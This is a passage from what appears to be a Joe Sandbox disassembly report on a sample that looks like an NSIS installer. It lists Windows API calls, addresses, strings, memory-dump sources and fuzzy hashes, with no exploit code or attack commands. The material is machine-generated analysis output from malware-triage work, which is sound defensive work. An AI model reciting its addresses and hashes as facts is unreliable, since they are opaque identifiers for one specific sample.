                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                • API String ID: 20674999-2124804629
                                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                • String ID: F$N$open
                                                                                                • API String ID: 3928313111-1104729357
                                                                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                APIs
                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                • API String ID: 565278875-3368763019
                                                                                                • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                • API String ID: 1641139501-220328614
                                                                                                • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                • API String ID: 3734993849-3206598305
                                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                Strings
                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                • API String ID: 3294113728-3145124454
                                                                                                • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                Strings
                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                • `G, xrefs: 0040246E
                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                • API String ID: 1033533793-4193110038
                                                                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                APIs
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                Strings
                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                • API String ID: 2014279497-3433828417
                                                                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
